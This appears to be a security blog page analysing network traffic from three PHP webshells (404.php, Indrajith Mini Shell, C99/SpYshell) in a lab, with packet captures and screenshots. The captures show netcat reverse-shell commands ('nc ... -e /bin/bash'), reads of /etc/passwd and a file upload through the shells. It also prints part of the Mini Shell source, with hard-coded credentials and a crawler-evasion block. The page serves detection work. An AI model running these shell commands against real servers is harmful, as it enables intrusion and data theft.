404 Not Found PHP webshell backdoor Traffic Analysis, Screenshots Reverse Shell Spawn and full PCAP file download

404.php Webshell backdoor is a sneaky one, if an admin views the php page it will look as if the file is not there and benign:

http://computersecurity.org/images/pcapanalysis/404_1.png

The secret trick to logging into the shell is hitting the tab button and a little prompt will appear where you type in your password to access the shell:

http://computersecurity.org/images/pcapanalysis/404_2.png

 

And then we login:

http://computersecurity.org/images/pcapanalysis/404_3.png

 

 

Here is what the network traffic it generates looks like:

 

017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422
E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 02:34:21.438028 IP 192.168.1.100.55555 > 192.168.1.102.53294: Flags [P.], seq 1011:1834, ack 1125, win 254, length 823
E.._.>@.@..?…d…f……{..w..P….l..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:21 GMT
Server: Apache/2.4.18 (Debian)
Set-Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

……….MP.n.0.|.W….,..%..8.
ly*.bi….-a..Q…..Wr.m. …#u.Y.?H`O..U.:..B.`……5<………D .bl….y^…….%..;….r……G’.MB.9…u..g.;..!”(..3..5C.^2n….o.i..|+..c.o.j…y:K…..’.I?..&…?.n……..82. .)…0..I…p<9…ER.`…^uX..>.^.Y.a….=….*…

2017-01-20 02:34:28.742646 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 1:614, ack 1, win 2053, length 613
E…..@…d<…f…d.0..2….&u.P…    J..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 12
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=letmein
2017-01-20 02:34:28.742666 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 614, win 238, length 0
E..(..@.@……d…f…0.&u.2.  .P….5..
2017-01-20 02:34:28.743719 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [P.], seq 1:767, ack 614, win 238, length 766
E..&..@.@……d…f…0.&u.2.  .P….3..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:28 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:34:33.005742 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 614:1228, ack 767, win 2050, length 614
E…..@…d8…f…d.0..2.      ..&x.P….|..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=password
2017-01-20 02:34:33.043487 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 1228, win 248, length 0
E..(..@.@……d…f…0.&x.2…P….5..
2017-01-20 02:34:33.359844 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], seq 767:5147, ack 1228, win 248, length 4380
E..D..@.@……d…f…0.&x.2…P….Q..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:33 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

 

2017-01-20 02:34:43.974969 IP 192.168.1.102.53297 > 192.168.1.100.55555: Flags [P.], seq 1:688, ack 1, win 2053, length 687
E…..@…c….f…d.1..H…….P….S..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 86
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251
2017-01-20 02:34:43.974988 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [.], ack 688, win 239, length 0
E..(..@.@……d…f…1….H..mP….5..
2017-01-20 02:34:44.314752 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [P.], seq 1:5231, ack 688, win 239, length 5230
E…..@.@..N…d…f…1….H..mP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:43 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:35:30.139077 IP 192.168.1.102.53304 > 192.168.1.100.55555: Flags [P.], seq 1:712, ack 1, win 2053, length 711
E….9@…c….f…d.8……….P…….POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 109
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash&p2=&p3=&charset=Windows-1251
2017-01-20 02:35:30.139097 IP 192.168.1.100.55555 > 192.168.1.102.53304: Flags [.], ack 712, win 240, length 0
E..(.,@.@……d…f…8……..P….5..
2017-01-20 02:35:30.611285 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [S], seq 3216154078, win 29200, options [mss 1460,sackOK,TS val 759617908 ecr 0,nop,wscale 7], length 0
E..<D.@.@.q….d…e…\……….r..H………
-F.t……..
2017-01-20 02:35:30.611975 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [S.], seq 451231491, ack 3216154079, win 14480, options [mss 1460,sackOK,TS val 287395312 ecr 759617908,nop,wscale 6], length 0
E..<..@.@……e…d.\….?…….8..#………
.!M.-F.t….
2017-01-20 02:35:30.611988 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 759617909 ecr 287395312], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F.u.!M.

2017-01-20 02:35:36.943763 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [P.], seq 1:4, ack 1, win 227, options [nop,nop,TS val 287395945 ecr 759617909], length 3
E..7r.@.@.C….e…d.\….?………o……
.!Pi-F.uid

2017-01-20 02:35:36.943789 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F…!Pi
2017-01-20 02:35:36.944117 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 353:393, ack 160, win 408, options [nop,nop,TS val 287395945 ecr 759619491], length 40
E..\.@@.@.42…e…d…..x>^’bb……n…..
.!Pi-F…<T……z.?P%#{…j.A..9..b.<…….r..
2017-01-20 02:35:36.944130 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 393, win 951, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4u.@.@.@….d…e….’bb..x>……@…..
-F…!Pi
2017-01-20 02:35:36.945239 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [P.], seq 1:55, ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 54
E..jD.@.@.q….d…e…\……?……v…..
-F…!Piuid=33(www-data) gid=33(www-data) groups=33(www-data)

Indrajith Mini Shell v.2.0 Traffic Analysis Python Reverse Shell Pivot Netcat Shell PCAP file download webshell backdoor

/*
* Indrajith Mini Shell v.2.0 with additional features….
* originally scripted by AJITH KP
* (c) Under Gnu General Public Licence 3(c)
* Team Open Fire and Indishell Family
* TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
* Indishell : ASHELL, D@rkwolf.
* THA : THA RUDE [There is Nothing in Borders]
* Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
*/

/*—————— LOGIN ——————-*/

$username=”admin”;
$password=”password”;
$email=”blah@gmail.com”;

/*—————— Login Data End ———-*/

@error_reporting(4);

/*—————— Anti Crawler ————*/
if(!empty($_SERVER[‘HTTP_USER_AGENT’]))
{
$userAgents = array(“Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex”, “Rambler”);
if(preg_match(‘/’ . implode(‘|’, $userAgents) . ‘/i’, $_SERVER[‘HTTP_USER_AGENT’]))
{
header(‘HTTP/1.0 404 Not Found’);
exit;
}
}
echo “<meta name=\”ROBOTS\” content=\”NOINDEX, NOFOLLOW\” />”; //For Ensuring… Fuck all Robots…
/*—————— End of Anti Crawler —–*/

http://computersecurity.org/images/pcapanalysis/minishell2.png

http://computersecurity.org/images/pcapanalysis/minishell.png

 

2017-01-20 04:53:39.022938 IP 192.168.1.102.56105 > 192.168.1.100.55555: Flags [P.], seq 703:1131, ack 1011, win 2049, length 428
E…..@…F6…f…d.)……4,!.P….$..GET /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 04:53:39.023459 IP 192.168.1.100.55555 > 192.168.1.102.56105: Flags [P.], seq 1011:3471, ack 1131, win 254, length 2460
E.      .j.@.@.C….d…f…)4,!…..P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:39 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2208
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

………..YYs…~..B.T_w..1x…..6q..m;.d^…….D.R..G…….~……..}G..H.E…..W.M…y…G.Gz….z…..’…..}..O…….E…*….[x..a..Z{3..M…..T.b..pd.C…vah…i.9#:.w.l.6/..”W..yr..S7…..c6o……?.nF……h..9a.._../…..h.7Q`…..8….O…O9Z4.Q…_.yX_.Y?….=~……Xe…U.?…………z…5.i…M…1.N…….u;..o…..s.<….6…..%eeHs..[..xh…=.T.JU…I.`i….J………?……h.Z..]…..35.mx.V…O…:……..B…qlHWg…r.L[…5;.wD…t…W…..=V./..:.X-t.>N…….7.o7> ……|X….ttqfQ.&q…..0M…,Q/…5.B.mH^.t..@.M\……V.G..D…&d…q…o……….7|..y….}..w………8..=……..B…Y^>whEp.@…….IlEnH..e#l.D.W…(P.&…6.Nkp.TO;9.k        ….tO-.&.B….\……..b.}OY.gdv…J…’6`o…..<.#..O.&…xE…V4.H.d.”&.c]…d… ..[..F{..  .-.&,….e.)\.@..D..+I..O+…?qQ.=S…~L..@….H.).{…Rn)….f..H|…\,…..Z..{. !.9….._……?.x,u.0..W.[Tf”…….KA..s.B..2,.#….spH2E….i*.V…..”.4…..#v…4.g.Xd.$…pnaM.        .]…..$
.R9……..CA.0Q5.Rj,…….YZi.`.Y.B..W….3ne..p$….3……D.uG.!6….N..p?..N1.k.y.p_67.R…..3..5..3..L..l67..}.y..)..n..!..;….lS..7..#d…@…..H.”….;1……+[@-..R”.!….LL
~……….?…..Z….0..)…JD.v..     Y..`B….0r…7…C….’.9….4.W..|).{ttTH….0.p.V[..&.       .oe>.P…S ‘fV..!…Ss.ug68.T ..tD..Y…….4SP……:EXR..}.v..5….<b…..48..@..O.Ur..M.A….cH………)I.Hcb…?v.1….t(……..z.).UB.0R……=v………..vJ    …..Z..OG..Q@u.`…….8…………0.B/..(..N….,..m….’…vse..)..A.\X…I..o5..*G……….4<……Q.W.$..-i..H..U#..h..j..i…6…-vS.*…%.B4..}..(N.5….z..N…#…..8.b..agC.m.Z……..~.`P.X.P.?……..{……Wr…W…k
|.B..p#….v..’=%….B…..Z..,A.q-…….’.|..B[om     ..?..R.L..APk.WQ..{.e…..Vs0<.~……..e.@….7..mx.%40ya..|o..h…q`}1c.H.f.z…K0……z>.9..3…<.7..n=..MtN.-..k.’..^…..<.2G….W………N……..N.}….,t…:.{…mL.I..u.~
….

 

2017-01-20 04:53:47.492620 IP 192.168.1.102.56109 > 192.168.1.100.55555: Flags [P.], seq 1:617, ack 1, win 2053, length 616
E…..@…Eh…f…d.-..i.].V.kUP… …POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

action=login&hide=&usrname=ry4wn&passwrd=password
2017-01-20 04:53:47.492641 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [.], ack 617, win 238, length 0
E..(..@.@……d…f…-V.kUi.`XP….5..
2017-01-20 04:53:47.641385 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [P.], seq 1:4840, ack 617, win 238, length 4839
E…..@.@……d…f…-V.kUi.`XP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:47 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

 

2017-01-20 04:54:16.709688 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [P.], seq 1:665, ack 1, win 2053, length 664
E…..@…E1…f…d.2…,….3^P…
…POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 23520
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryl1cCBVNLAAiFAzMh
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:16.709713 IP 192.168.1.100.55555 > 192.168.1.102.56114: Flags [.], ack 665, win 239, length 0
E..(.7@.@..~…d…f…2..3^.,..P….5..
2017-01-20 04:54:16.744669 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [.], seq 665:6505, ack 1, win 2053, length 5840
E…..@…0….f…d.2…,….3^P…….——WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name=”path”

/var/www/html
——WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name=”upload_f”; filename=”cerber4.PNG”
Content-Type: image/png

.PNG

2017-01-20 04:54:29.004913 IP 192.168.1.102.56118 > 192.168.1.100.55555: Flags [P.], seq 1:527, ack 1, win 2053, length 526
E..6/.@…E….f…d.6..V*mr>-.*P…xu..GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:29.004929 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [.], ack 527, win 237, length 0
E..(.A@.@..s…d…f…6>-.*V*o.P….5..
2017-01-20 04:54:29.006011 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [P.], seq 1:4781, ack 527, win 237, length 4780
E….B@.@……d…f…6>-.*V*o.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:54:29 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4527
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:55:04.451424 IP 192.168.1.102.56136 > 192.168.1.100.55555: Flags [P.], seq 1:554, ack 1, win 2053, length 553
E..Q/L@…E@…f…d.H..d…..N.P…Y…GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:55:04.451446 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [.], ack 554, win 237, length 0
E..(..@.@.1….d…f…H..N.d…P….5..
2017-01-20 04:55:04.454232 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [P.], seq 1:4888, ack 554, win 237, length 4887
E..?..@.@……d…f…H..N.d…P….L..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:55:04 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4634
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:56:27.249472 IP 192.168.1.102.56179 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.s…pk..7..P…&…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.102&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:27.249487 IP 192.168.1.100.55555 > 192.168.1.102.56179: Flags [.], ack 566, win 237, length 0
E..(..@.@……d…f…s.7…pm;P….5..
2017-01-20 04:56:27.249992 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732068 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:27.279498 IP 192.168.1.100.55555 > 192.168.1.102.56177: Flags [.], ack 567, win 237, length 0
E..(.&@.@……d…f…q…5…gP….5..
2017-01-20 04:56:27.753875 IP 192.168.1.102.56174 > 192.168.1.105.62663: Flags [R.], seq 2302, ack 1364, win 0, length 0
E..(.m@…qC…f…i.n..7.UM%l..P………….
2017-01-20 04:56:27.906170 IP 192.168.1.102.56086 > 172.217.5.238.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)j.@….^…f…………..j.P….U……..
2017-01-20 04:56:28.150144 IP 192.168.1.102.56087 > 172.217.7.161.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)p.@….O…f……….K..”..P…~………
2017-01-20 04:56:28.247493 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732318 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:28.295154 IP 192.168.1.102.55993 > 74.125.192.188.5228: Flags [.], seq 0:1, ack 1, win 258, length 1
E..)..@….Y…fJ}…..l….wm7KP….r……..
2017-01-20 04:56:28.435666 IP 192.168.1.102.56088 > 172.217.3.46.443: Flags [.], seq 0:1, ack 1, win 256, length 1
E..)..@……..f……..4.p….tP…=………
2017-01-20 04:56:30.251494 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732819 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….

2017-01-20 04:56:35.021686 IP 192.168.1.102.56180 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.t….p.f.TYP…_…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.101&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:35.021703 IP 192.168.1.100.55555 > 192.168.1.102.56180: Flags [.], ack 566, win 237, length 0
E..(w”@.@.?….d…f…tf.TY..rIP….5..
2017-01-20 04:56:35.022202 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [S], seq 3778293001, win 29200, options [mss 1460,sackOK,TS val 761734011 ecr 0,nop,wscale 7], length 0
E..<.r@.@..0…d…e.z.\.4-     ……r..H………
-g#{……..
2017-01-20 04:56:35.022902 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [S.], seq 1108359154, ack 3778293002, win 14480, options [mss 1460,sackOK,TS val 288241756 ecr 761734011,nop,wscale 6], length 0
E..<..@.@……e…d.\.zB.7..4-
..8.t……….
..8\-g#{….
2017-01-20 04:56:35.022912 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 761734011 ecr 288241756], length 0
E..4.s@.@..7…d…e.z.\.4-
B.7……@…..
-g#{..8\
2017-01-20 04:56:35.024064 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 1:17, ack 1, win 227, options [nop,nop,TS val 288241756 ecr 761734011], length 16
E..D..@.@……e…d.\.zB.7..4-
…..r…..
..8\-g#{cat /etc/passwd

2017-01-20 04:56:35.024076 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 0
E..4.t@.@..6…d…e.z.\.4-
B.8……@…..
-g#|..8\
2017-01-20 04:56:35.024600 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 1:94, ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 93
E….u@.@……d…e.z.\.4-
B.8…………
-g#|..8\Linux wittyserver 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

2017-01-20 04:57:39.776713 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 34:73, ack 4295, win 453, options [nop,nop,TS val 288248231 ecr 761737394], length 39
E..[..@.@……e…d.\.zB.8..4=…………
..Q.-g0.nc -nv 192.168.1.100 5555 -e /bin/bash

2017-01-20 04:57:39.777076 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 8009:8049, ack 2960, win 408, options [nop,nop,TS val 288248231 ecr 761750200], length 40
E..\..@.@.3….e…d…..xy.’bt4….t……
..Q.-gb…P@*.u..L%S.d..\r..d.@yo..>;.X..9.#n&h.
2017-01-20 04:57:39.777085 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 8049, win 1233, options [nop,nop,TS val 761750200 ecr 288248231], length 0
E..4v.@.@.?….d…e….’bt4.xyF…..@…..
-gb…Q.
2017-01-20 04:57:39.777528 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 4295:4335, ack 73, win 229, options [nop,nop,TS val 761750200 ecr 288248231], length 40
E..\..@.@……d…e.z.\.4=.B.8;…..h…..
-gb…Q.(UNKNOWN) [192.168.1.100] 5555 (?) open

 

-g……….

C99 Webshell Backdoor SpYshell v.KingDefacer Traffic Analysis PCAP file download screenshots

The C99 webshell usage, PCAP and screenshots of what it looks like, this has been one of the most commonly used webshells over the years.

2017-01-20 03:22:24.448614 IP 192.168.1.102.54057 > 192.168.1.100.55555: Flags [P.], seq 1:404, ack 1, win 2053, length 403
E…..@…Z|…f…d.)…..#.A..P…;…GET /c99.php?c99shcook[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:24.448633 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [.], ack 404, win 237, length 0
E..(/.@.@……d…f…).A….  .P….5..
2017-01-20 03:22:24.449057 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [P.], seq 1:327, ack 404, win 237, length 326
E..n/.@.@……d…f…).A….  .P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:24 GMT
Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm=”SpYshell KingDefacer: Restricted area”SpYshell v.KingDefacer
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href=”http://xxxxxxxxxxxxxxxxxxxxxxxx”>SpYshell v.KingDefacer</a>: Erisim Engellendi

